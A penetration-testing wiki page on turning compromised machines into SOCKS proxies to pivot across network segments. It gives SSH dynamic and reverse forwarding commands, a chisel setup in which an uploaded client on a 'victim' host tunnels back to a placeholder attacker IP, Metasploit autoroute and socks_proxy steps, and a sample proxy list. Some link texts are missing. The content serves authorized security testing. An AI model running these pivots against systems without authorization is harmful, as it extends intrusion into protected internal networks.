SOCKS proxy

PreviousPort forwarding Next(AV) Anti-Virus

Last updated 2 years ago

Was this helpful?

SOCKS proxy

Theory

SOCKS (SOCKet Secure) is a network protocol that allows users to route network traffic to a server on a client's behalf. SOCKS is between the application and the transport layer of the OSI model.

This is especially useful for penetration testing engagements where a target is hiding behind one or multiple firewalls. A compromised server connected to two networks can be used as a SOCKS proxy server to pivot from a network to another.

In short, a SOCKS proxy can relay TCP and UDP connections and hence help bypass network segmentation. It's sort a dynamic technique.

Practice

There are two types of dynamic port forwarding used during penetration testing engagements.

Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine.
Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine.

Basic server setup

While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.

In practice, there are many ways to turn a controlled machine into a SOCKS proxy server.

One of the most easy is by relying on SSH, however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply the -D option along with the port to use for tunneling. The command can also be used with -N option to make sure no command gets executed after the SSH session is opened.

ssh -N -D $PORT $CONTROLLED_TARGET

Once the ssh command exits successful (or once a session opens) the tester can then proceed to .

A reverse dynamic port forwarding can be also put in place to tunnel a machine's traffic through the attacker machine. It is implemented entirely in the client (i.e. the server does not need to be updated) ().

ssh -N -R $PORT $CONTROLLED_TARGET

is a standalone binary for pivoting on Linux and Windows systems.

Working on a server/client, the binary simply needs to be uploaded on the victim host and executed as server on the attacker machine.

# attacker
chisel server --reverse --socks5 -p $PORT

# victim
chisel client $ATTACKER_MACHINE_IP:$ATTACKER_MACHINE_PORT R:socks

A meterpreter session can be taken advantage of by setting up a SOCKS proxy with the appropriate module.

The first steps consists in creating a route, from a meterpreter shell to the target

meterpreter > run autoroute -s 10.11.1.0/24

The session can then be put in background and, the SOCKS server can be created.

msf > use auxiliary/server/socks_proxy
msf > set SRVPORT $PORT
msf > set VERSION 4a
msf > run

Basic client usage

# type    ip    port    [user    pass]
socks5    192.168.67.78    1080    lamer    secret
socks4    192.168.11.49    1080
http    192.168.89.33    8080    justu    hidden
http    192.168.39.93    8080

Chaining proxies